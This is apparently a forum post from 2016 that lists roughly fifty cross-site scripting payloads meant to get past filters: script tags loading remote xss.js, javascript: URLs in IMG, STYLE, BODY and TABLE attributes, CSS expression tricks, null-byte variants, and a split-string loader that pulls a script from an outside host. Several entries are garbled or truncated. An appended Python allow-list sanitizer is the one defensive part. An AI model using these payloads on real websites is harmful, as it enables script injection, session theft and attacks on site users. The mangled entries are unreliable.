XSS Attack Roundup

OP, posted on 2016-4-28 10:06:15
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Unusual pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG ""><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme example of XSS
<IMG SRC=\'#\'" /span>

(16) Getting around a character limit (all on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective in China, since there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
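Added here as a defender's counterpart to the list above, not part of the original post: a small Python allow-list check for user-supplied href/src values that replays the browser's pre-parse normalization (entity decoding, tab/newline/CR removal, trimming of leading controls), so the case, entity, whitespace and NUL variants of entries (3)-(5), (11)-(14) and (17) all collapse to the same rejected scheme. The allowed-scheme set and the sample inputs are constructed for this example.

```python
import html
import re

# Allow-list of schemes a user-supplied href/src may carry (assumption for this example).
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# Browsers trim C0 controls and space from both ends of a URL before parsing it,
# and delete tab, newline and CR anywhere inside it; a scheme check on the raw
# string misses that, which is what entries (11)-(14) and (19) rely on.
_TRIM = "".join(chr(c) for c in range(0x21))
_INNER = re.compile(r"[\t\n\r]")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def normalize_url(raw: str) -> str:
    """Replay the browser's pre-parse steps: decode HTML character references
    (entry 5), delete tab/newline/CR, trim leading and trailing controls."""
    decoded = html.unescape(raw)
    return _INNER.sub("", decoded).strip(_TRIM)


def safe_href(raw: str):
    """Return the normalized URL if its scheme is allow-listed, or it is a
    plain same-origin path; otherwise None so the caller drops the attribute.
    Case is folded, so the JaVaScRiPt variant of entry (4) is caught too."""
    url = normalize_url(raw)
    m = _SCHEME.match(url)
    if m:
        return url if m.group(1).lower() in ALLOWED_SCHEMES else None
    # No parseable scheme (this also covers the NUL-split "java\0script" of
    # entry 17): accept a path, reject protocol-relative "//host".
    if url.startswith("/") and not url.startswith("//"):
        return url
    return None


def img_tag(user_src: str) -> str:
    """Build an <img> from user input: reject bad URLs, then entity-encode the
    survivor so quotes and angle brackets cannot break out of the attribute
    the way entry (6) does."""
    src = safe_href(user_src)
    if src is None:
        return ""
    return '<img src="%s">' % html.escape(src, quote=True)


if __name__ == "__main__":
    # Constructed samples modelled on entries (3), (4), (5), (11), (13) and (17).
    for sample in ["javascript:alert('XSS')", "JaVaScRiPt:alert('XSS')",
                   "&#106;&#97;&#118;&#97;script:alert('XSS')",
                   "jav&#x09;ascript:alert('XSS')", "java\nscript:alert('XSS')",
                   "java\0script:alert('XSS')", " https://example.com/a.png"]:
        print(repr(sample), "->", safe_href(sample))
```

The lesson of the list is that each filter bypass targets a different pre-parse step, so an allow-list applied after normalization is the only check that does not need a new rule per entry.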